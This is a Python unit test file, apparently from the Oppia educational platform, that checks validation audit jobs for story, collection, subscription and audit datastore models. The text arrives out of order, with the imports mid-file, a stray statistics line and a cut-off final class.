'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated StoryRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class StoryCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-0-1'))
self.model_instance_1 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-1-1'))
self.model_instance_2 = (
story_models.StoryCommitLogEntryModel.get_by_id(
'story-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StoryCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: based on field story_ids '
'having value 0, expect model StoryModel with id 0 '
'but it doesn\'t exist", u"Entity id story-0-2: based '
'on field story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.story_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Story model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
story_models.StoryCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.story_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'StoryCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'StoryCommitLogEntryModel\', '
'[u\'Entity id story-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of StoryCommitLogEntryModel\', '
'[u\'Entity id story-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'public'
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'public but post_commit_is_private is True\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'private'
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of StoryCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'private but post_commit_is_private is False\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_story_node'
}, {
'cmd': 'delete_story_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_story_node check of '
'StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'delete_story_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: node_id, '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_story_node check of StoryCommitLogEntryModel\', '
'[u"Entity id story-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_story_node\'} '
'failed with error: The following required attributes '
'are missing: node_id, title"]]'
), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StorySummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
language_codes = ['ar', 'en', 'en']
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for index, story in enumerate(stories):
story.description = 'story-test'
story.language_code = language_codes[index]
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = story_models.StorySummaryModel.get_by_id('0')
self.model_instance_1 = story_models.StorySummaryModel.get_by_id('1')
self.model_instance_2 = story_models.StorySummaryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StorySummaryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '1', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
story_services.delete_story(self.owner_id, '1')
story_services.delete_story(self.owner_id, '2')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_model = story_models.StoryModel.get_by_id('0')
story_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
self.model_instance_0.story_model_last_updated = (
story_model.last_updated)
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StorySummaryModel\', '
'[u"Entity id 0: based on field story_ids having '
'value 0, expect model StoryModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_node_count(self):
self.model_instance_0.node_count = 10
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for node count check of '
'StorySummaryModel\', [u\'Entity id 0: Node count: 10 does '
'not match the number of nodes in story_contents dict: []\']]'
), u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_story_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'StorySummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding story title field: title 0\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated StorySummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class UserSubscriptionsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(UserSubscriptionsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in xrange(3, 6)]
for collection in collections:
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.publish_collection(self.owner, collection.id)
thread_id = feedback_services.create_thread(
'exploration', 'exp_id', None, 'a subject', 'some text')
subscription_services.subscribe_to_thread(
self.user_id, thread_id)
subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
for exp in explorations:
subscription_services.subscribe_to_exploration(
self.user_id, exp.id)
for collection in collections:
subscription_services.subscribe_to_collection(
self.user_id, collection.id)
self.process_and_flush_pending_tasks()
self.job_class = (
prod_validation_jobs_one_off.UserSubscriptionsModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated UserSubscriptionsModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_get_external_id_relationship_failure(self):
nonexist_thread_id = 'nonexist_thread_id'
subscription_services.subscribe_to_thread(
self.user_id, nonexist_thread_id)
expected_output = [
(
u'[u\'failed validation check for general_feedback_thread_ids '
'field check of UserSubscriptionsModel\', '
'[u"Entity id 110211048197157141232: based on '
'field general_feedback_thread_ids having value '
'nonexist_thread_id, expect model GeneralFeedbackThreadModel '
'with id nonexist_thread_id but it doesn\'t exist"]]'),
u'[u\'fully-validated UserSubscriptionsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
| 45.437904
| 80
| 0.623512
|
import ast
import datetime
import math
import random
import time
import types
from constants import constants
from core import jobs_registry
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import prod_validation_jobs_one_off
from core.domain import rating_services
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import story_domain
from core.domain import story_services
from core.domain import subscription_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
from google.appengine.api import datastore_types
from google.appengine.ext import db
gae_search_services = models.Registry.import_search_services()
USER_EMAIL = 'useremail@example.com'
USER_NAME = 'username'
CURRENT_DATETIME = datetime.datetime.utcnow()
(
activity_models, audit_models, base_models,
collection_models, config_models, email_models,
exp_models, feedback_models, file_models,
recommendations_models, story_models,
user_models,) = (
models.Registry.import_models([
models.NAMES.activity, models.NAMES.audit, models.NAMES.base_model,
models.NAMES.collection, models.NAMES.config, models.NAMES.email,
models.NAMES.exploration, models.NAMES.feedback, models.NAMES.file,
models.NAMES.recommendations, models.NAMES.story,
models.NAMES.user]))
OriginalDatetimeType = datetime.datetime
class PatchedDatetimeType(type):
def __instancecheck__(cls, other):
return isinstance(other, OriginalDatetimeType)
class MockDatetime13Hours(datetime.datetime):
__metaclass__ = PatchedDatetimeType
@classmethod
def utcnow(cls):
return CURRENT_DATETIME - datetime.timedelta(hours=13)
def run_job_and_check_output(
self, expected_output, sort=False, literal_eval=False):
job_id = self.job_class.create_new()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
self.job_class.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_tasks()
actual_output = self.job_class.get_output(job_id)
if literal_eval:
actual_output_dict = {}
expected_output_dict = {}
for item in [ast.literal_eval(value) for value in actual_output]:
value = item[1]
if isinstance(value, list):
value = sorted(value)
actual_output_dict[item[0]] = value
for item in [ast.literal_eval(value) for value in expected_output]:
value = item[1]
if isinstance(value, list):
value = sorted(value)
expected_output_dict[item[0]] = value
self.assertEqual(
sorted(actual_output_dict.keys()),
sorted(expected_output_dict.keys()))
for key in actual_output_dict:
self.assertEqual(actual_output_dict[key], expected_output_dict[key])
elif sort:
self.assertEqual(sorted(actual_output), sorted(expected_output))
else:
self.assertEqual(actual_output, expected_output)
def update_datastore_types_for_mock_datetime():
datastore_types._VALIDATE_PROPERTY_VALUES[MockDatetime13Hours] = (
datastore_types.ValidatePropertyNothing)
datastore_types._PACK_PROPERTY_VALUES[MockDatetime13Hours] = (
datastore_types.PackDatetime)
datastore_types._PROPERTY_MEANINGS[MockDatetime13Hours] = (
datastore_types.entity_pb.Property.GD_WHEN)
class MockModel(base_models.BaseModel):
pass
class MockSnapshotModel(base_models.BaseModel):
commit_type = 'edit'
commit_cmds = []
class MockBaseModelValidator(prod_validation_jobs_one_off.BaseModelValidator):
pass
class MockSummaryModelValidator(
prod_validation_jobs_one_off.BaseSummaryModelValidator):
@classmethod
def _get_external_id_relationships(cls, item):
return {}
class MockSnapshotContentModelValidator(
prod_validation_jobs_one_off.BaseSnapshotContentModelValidator):
@classmethod
def _get_external_id_relationships(cls, item):
return {}
class MockSnapshotMetadataModelValidator(
prod_validation_jobs_one_off.BaseSnapshotMetadataModelValidator):
EXTERNAL_MODEL_NAME = 'external model'
@classmethod
def _get_external_id_relationships(cls, item):
return {
'external_model_ids': (MockModel, [])
}
class NotImplementedErrorTests(test_utils.GenericTestBase):
def setUp(self):
super(NotImplementedErrorTests, self).setUp()
self.item = MockModel(id='mockmodel')
self.item.put()
def test_error_is_raised_if_fetch_external_properties_is_undefined(self):
with self.assertRaises(NotImplementedError):
MockBaseModelValidator().validate(self.item)
def test_error_is_get_external_model_properties_is_undefined(self):
with self.assertRaises(NotImplementedError):
MockSummaryModelValidator().validate(self.item)
def test_error_is_raised_if_external_model_name_is_undefined(self):
with self.assertRaisesRegexp(
Exception, 'External model name should be specified'):
MockSnapshotContentModelValidator().validate(self.item)
def test_error_is_raised_if_get_change_domain_class_is_undefined(self):
with self.assertRaises(NotImplementedError):
snapshot_model = MockSnapshotModel(id='mockmodel')
snapshot_model.put()
MockSnapshotMetadataModelValidator().validate(snapshot_model)
def test_error_is_raised_if_entity_classes_to_map_over_is_undefined(self):
job_class = prod_validation_jobs_one_off.ProdValidationAuditOneOffJob
with self.assertRaises(NotImplementedError), self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [job_class]):
job_id = job_class.create_new()
job_class.enqueue(job_id)
self.process_and_flush_pending_tasks()
class ActivityReferencesModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ActivityReferencesModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
exploration = exp_domain.Exploration.create_default_exploration(
'1exp', title='title', category='category')
exp_services.save_new_exploration(self.owner_id, exploration)
collection = collection_domain.Collection.create_default_collection(
'1col', title='title', category='category')
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance = (
activity_models.ActivityReferencesModel.get_or_create('featured'))
self.model_instance.activity_references = [{
'type': constants.ACTIVITY_TYPE_EXPLORATION,
'id': '1exp',
}, {
'type': constants.ACTIVITY_TYPE_COLLECTION,
'id': '1col',
}]
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.ActivityReferencesModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated ActivityReferencesModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ActivityReferencesModel\', '
'[u\'Entity id featured: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.created_on, self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'ActivityReferencesModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_missing_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for fetch properties of '
'ActivityReferencesModel\', '
'[u"Entity id featured: Entity properties cannot be fetched '
'completely with the error \'id\'"]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_type_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'invalid_type',
'id': '0'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for domain object check of '
'ActivityReferencesModel\', '
'[u\'Entity id featured: Entity fails domain validation with the '
'error Invalid activity type: invalid_type\']]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
'id': '1col'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for exploration_ids field check of '
'ActivityReferencesModel\', '
'[u"Entity id featured: based on field exploration_ids having '
'value 1col, expect model ExplorationModel with id 1col but '
'it doesn\'t exist"]]')]
run_job_and_check_output(self, expected_output)
def test_mock_model_with_invalid_id(self):
model_instance_with_invalid_id = (
activity_models.ActivityReferencesModel(id='invalid'))
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated ActivityReferencesModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'ActivityReferencesModel\', '
'[u\'Entity id invalid: Entity id does not match regex pattern\']]'
)]
run_job_and_check_output(self, expected_output, sort=True)
class RoleQueryAuditModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(RoleQueryAuditModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
admin_model = user_models.UserSettingsModel.get_by_id(self.admin_id)
admin_model.role = feconf.ROLE_ID_ADMIN
admin_model.put()
model_id = '%s.%s.%s.%s' % (
self.admin_id, int(math.floor(time.time())),
feconf.ROLE_ACTION_UPDATE, random.randint(0, 1000))
self.model_instance = audit_models.RoleQueryAuditModel(
id=model_id, user_id=self.admin_id,
intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.RoleQueryAuditModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated RoleQueryAuditModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of RoleQueryAuditModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'RoleQueryAuditModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_user_id(self):
user_models.UserSettingsModel.get(self.admin_id).delete()
expected_output = [(
u'[u\'failed validation check for user_ids field check of '
'RoleQueryAuditModel\', '
'[u"Entity id %s: based on field user_ids having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.admin_id, self.admin_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_invalid_id = '%s.%s.%s.%s' % (
'a', int(math.floor(time.time())), feconf.ROLE_ACTION_UPDATE,
random.randint(0, 1000))
model_instance_with_invalid_id = audit_models.RoleQueryAuditModel(
id=model_invalid_id, user_id=self.admin_id,
intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated RoleQueryAuditModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'RoleQueryAuditModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % model_invalid_id]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
language_codes = ['ar', 'en', 'en']
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = collection_models.CollectionModel.get_by_id('0')
self.model_instance_1 = collection_models.CollectionModel.get_by_id('1')
self.model_instance_2 = collection_models.CollectionModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.CollectionModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of CollectionModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'CollectionModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated CollectionModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('1').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for '
'exploration_ids field check of CollectionModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'1, expect model ExplorationModel '
'with id 1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_commit_log_entry_model_failure(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'collection_commit_log_entry_ids field check of '
'CollectionModel\', '
'[u"Entity id 0: based on field '
'collection_commit_log_entry_ids having value '
'collection-0-1, expect model CollectionCommitLogEntryModel '
'with id collection-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
collection_models.CollectionSummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for collection_summary_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field collection_summary_ids '
'having value 0, expect model CollectionSummaryModel with '
'id 0 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field collection_rights_ids having '
'value 0, expect model CollectionRightsModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model CollectionSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
collection_models.CollectionSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model CollectionSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotMetadataModelValidatorTests(
